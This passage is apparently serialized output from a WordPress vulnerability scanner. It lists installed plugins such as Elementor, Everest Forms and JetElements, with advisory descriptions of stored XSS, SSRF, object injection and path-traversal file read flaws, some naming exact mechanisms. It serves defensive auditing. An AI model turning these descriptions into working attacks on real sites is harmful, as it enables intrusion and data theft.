requests. The plugin registers the _elementor_data meta field with show_in_rest but omits a sanitize_callback, relying instead on a rest_pre_insert_post filter (sanitize_post_data function) that only sanitizes JSON-encoded request bodies. When a contributor sends a form-encoded PATCH request to the WordPress REST API, the json_decode() call on the raw body returns null, causing all sanitization to be skipped. The unsanitized data is then stored via update_post_meta() and later output without escaping through multiple widget sinks including the HTML widget\'s print_unescaped_setting() function. This makes it possible for authenticated attackers with Contributor-level access and above to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.\";s:13:\"introduced_in\";N;}i:27;O:8:\"stdClass\":5:{s:2:\"id\";s:36:\"bac7b428-9967-4c34-8519-8e39b0d52087\";s:5:\"title\";s:57:\"Elementor Website Builder < 4.1.1 - Missing Authorization\";s:8:\"fixed_in\";s:5:\"4.1.1\";s:11:\"description\";s:224:\"The plugin is vulnerable to unauthorized access due to a missing capability check on a function. This makes it possible for authenticated attackers, with Contributor-level access and above, to perform an unauthorized action.\";s:13:\"introduced_in\";N;}}}s:31:\"elementor-pro/elementor-pro.php\";O:8:\"stdClass\":2:{s:7:\"version\";s:5:\"3.7.7\";s:15:\"vulnerabilities\";a:12:{i:0;O:8:\"stdClass\":5:{s:2:\"id\";s:36:\"73e8e030-8e8b-43de-a602-c699ab2eafaf\";s:5:\"title\";s:61:\"Elementor Pro < 3.11.7 - Subscriber+ Arbitrary Options Update\";s:8:\"fixed_in\";s:6:\"3.11.7\";s:11:\"description\";s:338:\"The plugin does not have authorisation in an AJAX action (relying only on a nonce, which is available to any authenticated users), and does not validate the options to be updated. This allows any authenticated users, such as subscriber to update arbitrary blog options, such as the default_role, when the WooCommerce plugin is also active\";s:13:\"introduced_in\";N;}i:1;O:8:\"stdClass\":5:{s:2:\"id\";s:36:\"52195b1a-31b9-46da-bed8-7fdd2c6c8c14\";s:5:\"title\";s:74:\"Elementor Pro < 3.19.3 - Authenticated (Contributor+) Information Exposure\";s:8:\"fixed_in\";s:6:\"3.19.3\";s:11:\"description\";s:281:\"The Elementor Website Builder Pro plugin for WordPress is vulnerable to Sensitive Information Exposure in all versions up to, and including, 3.19.2 . This makes it possible for authenticated attackers, with contributor-level access and above, to extract arbitrary user meta values.\";s:13:\"introduced_in\";N;}i:2;O:8:\"stdClass\":5:{s:2:\"id\";s:36:\"d332bb66-e69c-4d11-8ff2-2c35d7ce2808\";s:5:\"title\";s:100:\"Elementor Website Builder Pro < 3.20.2 - Authententicated (Contributor+) Stored Cross-Site Scripting\";s:8:\"fixed_in\";s:6:\"3.20.2\";s:11:\"description\";s:453:\"The Elementor Website Builder Pro plugin for WordPress is vulnerable to Stored Cross-Site Scripting via widget\'s custom_id in all versions up to, and including, 3.20.1 due to insufficient input sanitization and output escaping on user supplied attributes. This makes it possible for authenticated attackers with contributor-level and above permissions to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.\";s:13:\"introduced_in\";N;}i:3;O:8:\"stdClass\":5:{s:2:\"id\";s:36:\"964c149d-fb08-4f86-a9a8-34a4412b5fdd\";s:5:\"title\";s:126:\"Elementor Website Builder Pro < 3.20.2 - Authenticated (Contributor+) DOM-Based Stored Cross-Site Scripting via video_html_tag\";s:8:\"fixed_in\";s:6:\"3.20.2\";s:11:\"description\";s:426:\"The Elementor Website Builder Pro plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the video_html_tag attribute in all versions up to, and including, 3.20.1 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with contributor access or higher, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.\";s:13:\"introduced_in\";N;}i:4;O:8:\"stdClass\":5:{s:2:\"id\";s:36:\"a48b0031-02f6-4871-beb3-0f61e1cd3d28\";s:5:\"title\";s:97:\"Elementor Website Builder Pro < 3.20.2 - Authenticated (Contributor+) Stored Cross-Site Scripting\";s:8:\"fixed_in\";s:6:\"3.20.2\";s:11:\"description\";s:469:\"The Elementor Website Builder Pro plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the plugin\'s Media Carousel widget in all versions up to, and including, 3.20.1 due to insufficient input sanitization and output escaping on user supplied attributes. This makes it possible for authenticated attackers with contributor-level and above permissions to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.\";s:13:\"introduced_in\";N;}i:5;O:8:\"stdClass\":5:{s:2:\"id\";s:36:\"ed24ea21-967a-43e3-8219-daed594c6e11\";s:5:\"title\";s:147:\"Elementor Website Builder – More than Just a Page Builder < 3.20.2 - Authenticated (Contributor+) Stored Cross-Site Scripting via Post Navigation\";s:8:\"fixed_in\";s:6:\"3.20.2\";s:11:\"description\";s:500:\"The Elementor Website Builder – More than Just a Page Builder plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the plugin\'s Post Navigation widget in all versions up to, and including, 3.20.1 due to insufficient input sanitization and output escaping on user supplied attributes. This makes it possible for authenticated attackers with contributor-level and above permissions to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.\";s:13:\"introduced_in\";N;}i:6;O:8:\"stdClass\":5:{s:2:\"id\";s:36:\"249f4270-610c-4422-b34f-e714358fb398\";s:5:\"title\";s:130:\"Elementor Website Builder Pro < 3.20.2 - Authenticated (Contributor+) Stored Cross-Site Scripting via Form Widget SVGZ File Upload\";s:8:\"fixed_in\";s:6:\"3.20.2\";s:11:\"description\";s:585:\"The Elementor Website Builder Pro plugin for WordPress is vulnerable to Stored Cross-Site Scripting via an SVGZ file uploaded via the Form widget in all versions up to, and including, 3.20.1 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page. NOTE: This vulnerability is only exploitable on web servers running NGINX. It is not exploitable on web servers running Apache HTTP Server.\";s:13:\"introduced_in\";N;}i:7;O:8:\"stdClass\":5:{s:2:\"id\";s:36:\"f54baf17-050d-4972-9631-3026dfb04496\";s:5:\"title\";s:107:\"Elementor Website Builder Pro < 3.21.2 - Authenticated (Contributor+) DOM-Based Stored Cross-Site Scripting\";s:8:\"fixed_in\";s:6:\"3.21.2\";s:11:\"description\";s:461:\"The Elementor Website Builder – More than Just a Page Builder Pro plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the several parameters in versions up to, and including, 3.21.0 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with contributor-level permissions and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.\";s:13:\"introduced_in\";N;}i:8;O:8:\"stdClass\":5:{s:2:\"id\";s:36:\"b69f5b22-654f-459f-875d-ea6ba984b699\";s:5:\"title\";s:55:\"Elementor Pro < 3.21.3 - Reflected Cross-Site Scripting\";s:8:\"fixed_in\";s:6:\"3.21.3\";s:11:\"description\";s:386:\"The Elementor Pro plugin for WordPress is vulnerable to Reflected Cross-Site Scripting in versions up to, and including, 3.21.2 due to insufficient input sanitization and output escaping. This makes it possible for unauthenticated attackers to inject arbitrary web scripts in pages that execute if they can successfully trick a user into performing an action such as clicking on a link.\";s:13:\"introduced_in\";N;}i:9;O:8:\"stdClass\":5:{s:2:\"id\";s:36:\"771699f9-aa9b-4352-8382-5fbc17f364c2\";s:5:\"title\";s:149:\"Elementor Website Builder Pro – More than Just a Page Builder < 3.25.11 - Authenticated (Contributor+) Sensitive Information Exposure via Shortcode\";s:8:\"fixed_in\";s:7:\"3.25.11\";s:11:\"description\";s:430:\"The Elementor Website Builder Pro plugin for WordPress is vulnerable to Sensitive Information Exposure in all versions up to, and including, 3.25.10 via the \'elementor-template\' shortcode. This makes it possible for authenticated attackers, with Contributor-level access and above, to extract sensitive data including the content of Private, Pending, and Draft Templates. The vulnerability was partially patched in version 3.24.4.\";s:13:\"introduced_in\";N;}i:10;O:8:\"stdClass\":5:{s:2:\"id\";s:36:\"e6f51ff0-a6de-4124-b753-a932f7f5e5f0\";s:5:\"title\";s:81:\"Elementor Pro < 3.29.1 - Authenticated (Contributor+) Stored Cross-Site Scripting\";s:8:\"fixed_in\";s:6:\"3.29.1\";s:11:\"description\";s:435:\"The Elementor Website Builder Pro plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the ‘button_text’ parameter in all versions up to, and including, 3.29.0 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with Contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.\";s:13:\"introduced_in\";N;}i:11;O:8:\"stdClass\":5:{s:2:\"id\";s:36:\"fc8e4264-fa78-44d2-8b6d-6c4305cd2280\";s:5:\"title\";s:60:\"Elementor Website Builder < 3.29.1 - Contributor+ Stored XSS\";s:8:\"fixed_in\";s:6:\"3.29.1\";s:11:\"description\";s:312:\"The plugins are vulnerable to Stored Cross-Site Scripting due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.\";s:13:\"introduced_in\";N;}}}s:31:\"everest-forms/everest-forms.php\";O:8:\"stdClass\":2:{s:7:\"version\";s:5:\"2.0.6\";s:15:\"vulnerabilities\";a:14:{i:0;O:8:\"stdClass\":5:{s:2:\"id\";s:36:\"b5849147-396b-4538-95b7-db46bc7f385b\";s:5:\"title\";s:80:\"Everest Forms < 2.0.8 - Unauthenticated Server-Side Request Forgery via font_url\";s:8:\"fixed_in\";s:5:\"2.0.8\";s:11:\"description\";s:432:\"The Everest Forms plugin for WordPress is vulnerable to Server-Side Request Forgery via the \'font_url\' parameter. This makes it possible for unauthenticated attackers to make web requests to arbitrary locations originating from the web application and can be used to query and modify information from internal services.\r\nIt is worth mentioning that while the fix prevents the attack, it broke the `Load Fonts Locally` functionality.\";s:13:\"introduced_in\";N;}i:1;O:8:\"stdClass\":5:{s:2:\"id\";s:36:\"e5f94dcf-a6dc-4c4c-acb6-1a7ead701053\";s:5:\"title\";s:43:\"Everest Forms < 3.0.3.1 - Admin+ Stored XSS\";s:8:\"fixed_in\";s:7:\"3.0.3.1\";s:11:\"description\";s:250:\"The plugin does not sanitise and escape some of its settings, which could allow high privilege users such as admin to perform Stored Cross-Site Scripting attacks even when the unfiltered_html capability is disallowed (for example in multisite setup).\";s:13:\"introduced_in\";N;}i:2;O:8:\"stdClass\":5:{s:2:\"id\";s:36:\"85d590c9-c96d-40c9-aa59-48302ba3d63c\";s:5:\"title\";s:43:\"Everest Forms < 3.0.4.2 - Admin+ Stored XSS\";s:8:\"fixed_in\";s:7:\"3.0.4.2\";s:11:\"description\";s:250:\"The plugin does not sanitise and escape some of its settings, which could allow high privilege users such as admin to perform Stored Cross-Site Scripting attacks even when the unfiltered_html capability is disallowed (for example in multisite setup).\";s:13:\"introduced_in\";N;}i:3;O:8:\"stdClass\":5:{s:2:\"id\";s:36:\"f60a8358-1765-4cae-9c89-0d75c5e394ec\";s:5:\"title\";s:43:\"Everest Forms < 3.0.8.1 - Admin+ Stored XSS\";s:8:\"fixed_in\";s:7:\"3.0.8.1\";s:11:\"description\";s:250:\"The plugin does not sanitise and escape some of its settings, which could allow high privilege users such as admin to perform Stored Cross-Site Scripting attacks even when the unfiltered_html capability is disallowed (for example in multisite setup).\";s:13:\"introduced_in\";N;}i:4;O:8:\"stdClass\":5:{s:2:\"id\";s:36:\"26cdd6ec-06c0-4632-b7cc-fcb0406d37d4\";s:5:\"title\";s:83:\"Everest Forms < 3.0.9.5 - Unauthenticated Arbitrary File Upload, Read, and Deletion\";s:8:\"fixed_in\";s:7:\"3.0.9.5\";s:11:\"description\";s:557:\"The Everest Forms – Contact Forms, Quiz, Survey, Newsletter & Payment Form Builder for WordPress plugin for WordPress is vulnerable to arbitrary file upload, read, and deletion due to missing file type and path validation in the \'format\' method of the EVF_Form_Fields_Upload class in all versions up to, and including, 3.0.9.4. This makes it possible for unauthenticated attackers to upload, read, and delete arbitrary files on the affected site\'s server which may make remote code execution, sensitive information disclosure, or a site takeover possible.\";s:13:\"introduced_in\";N;}i:5;O:8:\"stdClass\":5:{s:2:\"id\";s:36:\"6237f7d1-83ae-4bbc-aa81-95bbedc09a87\";s:5:\"title\";s:81:\"Everest Forms < 3.1.2 - Authenticated (Subscriber+) Arbitrary Shortcode Execution\";s:8:\"fixed_in\";s:5:\"3.1.2\";s:11:\"description\";s:472:\"The The Everest Forms – Contact Form, Quiz, Survey, Newsletter & Payment Form Builder for WordPress plugin for WordPress is vulnerable to arbitrary shortcode execution in all versions up to, and including, 3.1.1. This is due to the software allowing users to execute an action that does not properly validate a value before running do_shortcode. This makes it possible for authenticated attackers, with Subscriber-level access and above, to execute arbitrary shortcodes.\";s:13:\"introduced_in\";N;}i:6;O:8:\"stdClass\":5:{s:2:\"id\";s:36:\"83076aaa-30ab-467e-9ba8-5f88ed37c0cd\";s:5:\"title\";s:54:\"Everest Forms < 3.1.2 - Reflected Cross-Site Scripting\";s:8:\"fixed_in\";s:5:\"3.1.2\";s:11:\"description\";s:497:\"The Everest Forms – Contact Form, Quiz, Survey, Newsletter & Payment Form Builder for WordPress plugin for WordPress is vulnerable to Reflected Cross-Site Scripting via the \'form_id\' parameter in all versions up to, and including, 3.1.1 due to insufficient input sanitization and output escaping. This makes it possible for unauthenticated attackers to inject arbitrary web scripts in pages that execute if they can successfully trick a user into performing an action such as clicking on a link.\";s:13:\"introduced_in\";N;}i:7;O:8:\"stdClass\":5:{s:2:\"id\";s:36:\"b90d6420-0de1-42cd-aee2-2473a757a320\";s:5:\"title\";s:60:\"Everest Forms < 3.1.2 - Unauthenticated PHP Object Injection\";s:8:\"fixed_in\";s:5:\"3.1.2\";s:11:\"description\";s:624:\"The plugin is vulnerable to PHP Object Injection via deserialization of untrusted input from the \'field_value\' parameter. This makes it possible for unauthenticated attackers to inject a PHP Object. No known POP chain is present in the vulnerable software, which means this vulnerability has no impact unless another plugin or theme containing a POP chain is installed on the site. If a POP chain is present via an additional plugin or theme installed on the target system, it may allow the attacker to perform actions like delete arbitrary files, retrieve sensitive data, or execute code depending on the POP chain present.\";s:13:\"introduced_in\";N;}i:8;O:8:\"stdClass\":5:{s:2:\"id\";s:36:\"62c5339e-1d3d-4ac5-aaa0-0a04580d18a1\";s:5:\"title\";s:60:\"Everest Forms < 3.2.3 - Unauthenticated PHP Object Injection\";s:8:\"fixed_in\";s:5:\"3.2.3\";s:11:\"description\";s:412:\"The plugin is vulnerable to PHP Object Injection via deserialization of untrusted input. This makes it possible for unauthenticated attackers to inject a PHP Object. No known POP chain is present in the vulnerable software. If a POP chain is present via an additional plugin or theme installed on the target system, it could allow the attacker to delete arbitrary files, retrieve sensitive data, or execute code.\";s:13:\"introduced_in\";N;}i:9;O:8:\"stdClass\":5:{s:2:\"id\";s:36:\"e104a9c8-122e-49da-9123-47f6d2c32b02\";s:5:\"title\";s:84:\"Everest Forms < 3.4.4 - Unauthenticated PHP Object Injection via Form Entry Metadata\";s:8:\"fixed_in\";s:5:\"3.4.4\";s:11:\"description\";s:732:\"The plugin is vulnerable to PHP Object Injection via deserialization of untrusted input from form entry metadata. This is due to the html-admin-page-entries-view.php file calling PHP\'s native unserialize() on stored entry meta values without passing the allowed_classes parameter. This makes it possible for unauthenticated attackers to inject a serialized PHP object payload through any public Everest Forms form field. The payload survives sanitize_text_field() sanitization (serialization control characters are not stripped) and is stored in the wp_evf_entrymeta database table. When an administrator views entries or views an individual entry, the unsafe unserialize() call processes the stored data without class restrictions.\";s:13:\"introduced_in\";N;}i:10;O:8:\"stdClass\":5:{s:2:\"id\";s:36:\"70ecc047-c3f6-4cb5-ba7b-961036555fa8\";s:5:\"title\";s:111:\"Everest Forms < 3.4.5 - Unauthenticated Arbitrary File Read and Deletion via Upload Field \'old_files\' Parameter\";s:8:\"fixed_in\";s:5:\"3.4.5\";s:11:\"description\";s:1066:\"The plugin is vulnerable to Arbitrary File Read and Deletion due to the plugin trusting attacker-controlled old_files data from public form submissions as legitimate server-side upload state, and converting attacker-supplied URLs into local filesystem paths using regex-based string replacement without canonicalization or directory boundary enforcement. This makes it possible for unauthenticated attackers to read arbitrary local files (e.g., wp-config.php) by injecting path-traversal payloads into the old_files upload field parameter, which are then attached to notification emails. The same path resolution is also used in the post-email cleanup routine, which calls unlink() on the resolved path, resulting in the targeted file being deleted after being attached. This can lead to full site compromise through disclosure of database credentials and authentication salts from wp-config.php, and denial of service through deletion of critical files. Prerequisite: The form must contain a file-upload or image-upload field, and disable storing entry information.\";s:13:\"introduced_in\";N;}i:11;O:8:\"stdClass\":5:{s:2:\"id\";s:36:\"a8dd4d4c-405d-4365-8379-a0db1e27165c\";s:5:\"title\";s:69:\"Everest Forms < 3.4.2 - Unauthenticated Arbitrary Shortcode Execution\";s:8:\"fixed_in\";s:5:\"3.4.2\";s:11:\"description\";s:420:\"The The Everest Forms – Contact Form, Payment Form, Quiz, Survey & Custom Form Builder plugin for WordPress is vulnerable to arbitrary shortcode execution in all versions up to, and including, 3.4.1. This is due to the software allowing users to execute an action that does not properly validate a value before running do_shortcode. This makes it possible for unauthenticated attackers to execute arbitrary shortcodes.\";s:13:\"introduced_in\";N;}i:12;O:8:\"stdClass\":5:{s:2:\"id\";s:36:\"af559211-8c6b-4f31-ba74-c44ed334a313\";s:5:\"title\";s:157:\"Everest Forms – Contact Form, Payment Form, Quiz, Survey & Custom Form Builder < 3.4.8 - Missing Authorization to Authenticated (Subscriber+) Email Sending\";s:8:\"fixed_in\";s:5:\"3.4.8\";s:11:\"description\";s:414:\"The Everest Forms – Contact Form, Payment Form, Quiz, Survey & Custom Form Builder plugin for WordPress is vulnerable to unauthorized email sending due to a missing capability check on the send_test_email() function in all versions up to, and including, 3.4.7. This makes it possible for authenticated attackers, with Subscriber-level access and above, to send test emails to arbitrary addresses from the server.\";s:13:\"introduced_in\";N;}i:13;O:8:\"stdClass\":5:{s:2:\"id\";s:36:\"4bd381e9-2f4e-4e61-99af-88f50aed71f5\";s:5:\"title\";s:97:\"Everest Forms < 3.5.0 - Unauthenticated Sensitive Information Exposure via Residual CSV Artifacts\";s:8:\"fixed_in\";s:5:\"3.5.0\";s:11:\"description\";s:703:\"The plugin does not reliably delete temporary CSV files generated during email-notification processing and leaves them publicly accessible in the uploads directory, allowing unauthenticated attackers to retrieve other users\' form submission records via predictable, enumerable filenames.\r\n\r\nExploitation requires the Everest Forms Pro add-on to be active (the CSV email-attachment option is provided by Pro) and a form with more than one email notification where the CSV attachment is enabled on a notification that is not processed last. Form entry identifiers are sequential and are returned to the submitter in the submission response, which makes the retained artifacts straightforward to enumerate.\";s:13:\"introduced_in\";N;}}}s:25:\"gtranslate/gtranslate.php\";O:8:\"stdClass\":2:{s:7:\"version\";s:5:\"3.0.9\";s:15:\"vulnerabilities\";a:0:{}}s:59:\"intuitive-custom-post-order/intuitive-custom-post-order.php\";O:8:\"stdClass\":2:{s:7:\"version\";s:5:\"3.1.5\";s:15:\"vulnerabilities\";a:0:{}}s:21:\"jet-blog/jet-blog.php\";O:8:\"stdClass\":2:{s:7:\"version\";s:5:\"2.3.1\";s:15:\"vulnerabilities\";a:6:{i:0;O:8:\"stdClass\":5:{s:2:\"id\";s:36:\"ab13d4e1-c49b-4707-9cb7-ce0eee885662\";s:5:\"title\";s:76:\"JetBlog < 2.4.3.1 - Authenticated (Contributor+) Stored Cross-Site Scripting\";s:8:\"fixed_in\";s:7:\"2.4.3.1\";s:11:\"description\";s:372:\"The JetBlog plugin for WordPress is vulnerable to Stored Cross-Site Scripting in versions up to, and including, 2.4.3 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.\";s:13:\"introduced_in\";N;}i:1;O:8:\"stdClass\":5:{s:2:\"id\";s:36:\"c27a120f-4833-4e9e-a2d0-fcce68e8aaf2\";s:5:\"title\";s:41:\"JetBlog < 2.4.3.1 - Missing Authorization\";s:8:\"fixed_in\";s:7:\"2.4.3.1\";s:11:\"description\";s:264:\"The JetBlog for Elementor plugin for WordPress is vulnerable to unauthorized access due to a missing capability check on a function in all versions up to, and including, 2.4.3. This makes it possible for unauthenticated attackers to perform an unauthorized action.\";s:13:\"introduced_in\";N;}i:2;O:8:\"stdClass\":5:{s:2:\"id\";s:36:\"f4063628-96e8-4465-b9f7-16b6a29a38dc\";s:5:\"title\";s:74:\"JetBlog < 2.4.5 - Authenticated (Contributor+) Stored Cross-Site Scripting\";s:8:\"fixed_in\";s:5:\"2.4.5\";s:11:\"description\";s:374:\"The JetBlog plugin for WordPress is vulnerable to Stored Cross-Site Scripting in versions up to, and including, 2.4.4.1 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.\";s:13:\"introduced_in\";N;}i:3;O:8:\"stdClass\":5:{s:2:\"id\";s:36:\"7dbe7206-06c4-4e54-9bd0-0a1b1bca8b9c\";s:5:\"title\";s:50:\"JetBlog < 2.4.4.1 - Reflected Cross-Site Scripting\";s:8:\"fixed_in\";s:7:\"2.4.4.1\";s:11:\"description\";s:379:\"The JetBlog plugin for WordPress is vulnerable to Reflected Cross-Site Scripting in versions up to, and including, 2.4.4 due to insufficient input sanitization and output escaping. This makes it possible for unauthenticated attackers to inject arbitrary web scripts in pages that execute if they can successfully trick a user into performing an action such as clicking on a link.\";s:13:\"introduced_in\";N;}i:4;O:8:\"stdClass\":5:{s:2:\"id\";s:36:\"caa5212c-a13e-44ce-bf13-08ed90374ad7\";s:5:\"title\";s:41:\"JetBlog < 2.4.7.1 - Missing Authorization\";s:8:\"fixed_in\";s:7:\"2.4.7.1\";s:11:\"description\";s:290:\"The JetBlog plugin for WordPress is vulnerable to unauthorized access due to a missing capability check on a function in all versions up to, and including, 2.4.7. This makes it possible for authenticated attackers, with Contributor-level access and above, to perform an unauthorized action.\";s:13:\"introduced_in\";N;}i:5;O:8:\"stdClass\":5:{s:2:\"id\";s:36:\"b19002e8-0464-423f-8849-0f1b1d102d43\";s:5:\"title\";s:56:\"JetBlog < 2.4.8.1 - Unauthenticated Information Exposure\";s:8:\"fixed_in\";s:7:\"2.4.8.1\";s:11:\"description\";s:227:\"The JetBlog plugin for WordPress is vulnerable to Sensitive Information Exposure in all versions up to, and including, 2.4.8. This makes it possible for unauthenticated attackers to extract sensitive user or configuration data.\";s:13:\"introduced_in\";N;}}}s:29:\"jet-elements/jet-elements.php\";O:8:\"stdClass\":2:{s:7:\"version\";s:5:\"2.5.8\";s:15:\"vulnerabilities\";a:12:{i:0;O:8:\"stdClass\":5:{s:2:\"id\";s:36:\"cf9c4f4f-d7ba-41c5-b817-61f5879119f8\";s:5:\"title\";s:109:\"JetElements For Elementor < 2.6.13.1 - Missing Authorization to Unauthenticated Arbitrary Attachment Download\";s:8:\"fixed_in\";s:8:\"2.6.13.1\";s:11:\"description\";s:272:\"The JetElements plugin for WordPress is vulnerable to unauthorized access of data due to a missing capability check on an unknown function in all versions up to, and including, 2.6.13. This makes it possible for unauthenticated attackers to download arbitrary attachments.\";s:13:\"introduced_in\";N;}i:1;O:8:\"stdClass\":5:{s:2:\"id\";s:36:\"b662edc4-80d7-4a4e-a4d3-31bc94257cf2\";s:5:\"title\";s:84:\"JetElements < 2.6.20.1 - Authenticated (Contributor+) Arbitrary Local File Inclusion\";s:8:\"fixed_in\";s:8:\"2.6.20.1\";s:11:\"description\";s:533:\"The JetElements plugin for WordPress is vulnerable to Local File Inclusion in all versions up to, and including, 2.6.20 via the \'progress_type\' parameter. This makes it possible for authenticated attackers, with Contributor-level access and above, to include and execute arbitrary files on the server, allowing the execution of any PHP code in those files. This can be used to bypass access controls, obtain sensitive data, or achieve code execution in cases where images and other “safe” file types can be uploaded and included.\";s:13:\"introduced_in\";N;}i:2;O:8:\"stdClass\":5:{s:2:\"id\";s:36:\"c8adfc30-3ad4-4514-b50a-1c3f04a9299a\";s:5:\"title\";s:81:\"JetElements < 2.6.20.1 - Authenticated (Contributor+) Stored Cross-Site Scripting\";s:8:\"fixed_in\";s:8:\"2.6.20.1\";s:11:\"description\";s:420:\"The JetElements plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the \'id\' and \'slide_id\' parameters in all versions up to, and including, 2.6.20 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with Contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.\";s:13:\"introduced_in\";N;}i:3;O:8:\"stdClass\":5:{s:2:\"id\";s:36:\"3e40c945-5ff3-4d3a-b690-3b2dc1a77c74\";s:5:\"title\";s:100:\"Jet Elements < 2.7.3 - Authenticated (Contributor+) Stored Cross-Site Scripting via Multiple Widgets\";s:8:\"fixed_in\";s:5:\"2.7.3\";s:11:\"description\";s:430:\"The JetElements plugin for WordPress is vulnerable to Stored Cross-Site Scripting via several widgets in all versions up to, and including, 2.7.2.1 due to insufficient input sanitization and output escaping on user supplied attributes. This makes it possible for authenticated attackers, with contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.\";s:13:\"introduced_in\";N;}i:4;O:8:\"stdClass\":5:{s:2:\"id\";s:36:\"2a88f784-7403-408f-9fc4-989c90113e22\";s:5:\"title\";s:94:\"JetElements For Elementor < 2.7.4.2 - Authenticated (Contributor+) Stored Cross-Site Scripting\";s:8:\"fixed_in\";s:7:\"2.7.4.2\";s:11:\"description\";s:392:\"The JetElements For Elementor plugin for WordPress is vulnerable to Stored Cross-Site Scripting in versions up to, and including, 2.7.4.1 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.\";s:13:\"introduced_in\";N;}i:5;O:8:\"stdClass\":5:{s:2:\"id\";s:36:\"2d32dbce-cd45-4f62-98e0-b5b8fcda1387\";s:5:\"title\";s:59:\"JetElements For Elementor < 2.7.4.2 - Missing Authorization\";s:8:\"fixed_in\";s:7:\"2.7.4.2\";s:11:\"description\";s:256:\"The JetElements plugin for WordPress is vulnerable to unauthorized access due to a missing capability check on a function in all versions up to, and including, 2.7.4.1. This makes it possible for unauthenticated attackers to perform an unauthorized action.\";s:13:\"introduced_in\";N;}i:6;O:8:\"stdClass\":5:{s:2:\"id\";s:36:\"8a4df39e-5ecd-4ea4-89e5-fa234d92b687\";s:5:\"title\";s:88:\"JetElements For Elementor < 2.7.7.1 - Authenticated (Subscriber+) Information Disclosure\";s:8:\"fixed_in\";s:7:\"2.7.7.1\";s:11:\"description\";s:270:\"The JetElements plugin for WordPress is vulnerable to Sensitive Information Exposure in all versions up to, and including, 2.7.7. This makes it possible for authenticated attackers, with Subscriber-level access and above, to extract sensitive user or configuration data.\";s:13:\"introduced_in\";N;}i:7;O:8:\"stdClass\":5:{s:2:\"id\";s:36:\"faceb6b5-bdc3-4203-95de-e63198d76d67\";s:5:\"title\";s:94:\"JetElements For Elementor < 2.7.7.1 - Authenticated (Contributor+) Stored Cross-Site Scripting\";s:8:\"fixed_in\";s:7:\"2.7.7.1\";s:11:\"description\";s:390:\"The JetElements For Elementor plugin for WordPress is vulnerable to Stored Cross-Site Scripting in versions up to, and including, 2.7.7 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.\";s:13:\"introduced_in\";N;}i:8;O:8:\"stdClass\":5:{s:2:\"id\";s:36:\"a06d4374-783e-415b-a4b9-da1700244b7c\";s:5:\"title\";s:94:\"JetElements For Elementor < 2.7.9.1 - Authenticated (Contributor+) Stored Cross-Site Scripting\";s:8:\"fixed_in\";s:7:\"2.7.9.1\";s:11:\"description\";s:390:\"The JetElements For Elementor plugin for WordPress is vulnerable to Stored Cross-Site Scripting in versions up to, and including, 2.7.9 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.\";s:13:\"introduced_in\";N;}i:9;O:8:\"stdClass\":5:{s:2:\"id\";s:36:\"068cc6fe-4fef-4ac6-be09-4b3c9f781e4c\";s:5:\"title\";s:94:\"JetElements For Elementor < 2.7.8.1 - Authenticated (Contributor+) Stored Cross-Site Scripting\";s:8:\"fixed_in\";s:7:\"2.7.8.1\";s:11:\"description\";s:390:\"The JetElements For Elementor plugin for WordPress is vulnerable to Stored Cross-Site Scripting in versions up to, and including, 2.7.8 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.\";s:13:\"introduced_in\";N;}i:10;O:8:\"stdClass\":5:{s:2:\"id\";s:36:\"0db92961-f42d-4cc0-a7d0-7e82aaf73609\";s:5:\"title\";s:95:\"JetElements For Elementor < 2.7.12.1 - Authenticated (Contributor+) Stored Cross-Site Scripting\";s:8:\"fixed_in\";s:8:\"2.7.12.1\";s:11:\"description\";s:391:\"The JetElements For Elementor plugin for WordPress is vulnerable to Stored Cross-Site Scripting in versions up to, and including, 2.7.12 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.\";s:13:\"introduced_in\";N;}i:11;O:8:\"stdClass\":5:{s:2:\"id\";s:36:\"3c098742-5eb6-427a-89bc-88c2c6f5b8ce\";s:5:\"title\";s:95:\"JetElements For Elementor < 2.7.12.3 - Authenticated (Contributor+) Stored Cross-Site Scripting\";s:8:\"fixed_in\";s:8:\"2.7.12.3\";s:11:\"description\";s:393:\"The JetElements For Elementor plugin for WordPress is vulnerable to Stored Cross-Site Scripting in versions up to, and including, 2.7.12.2 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected 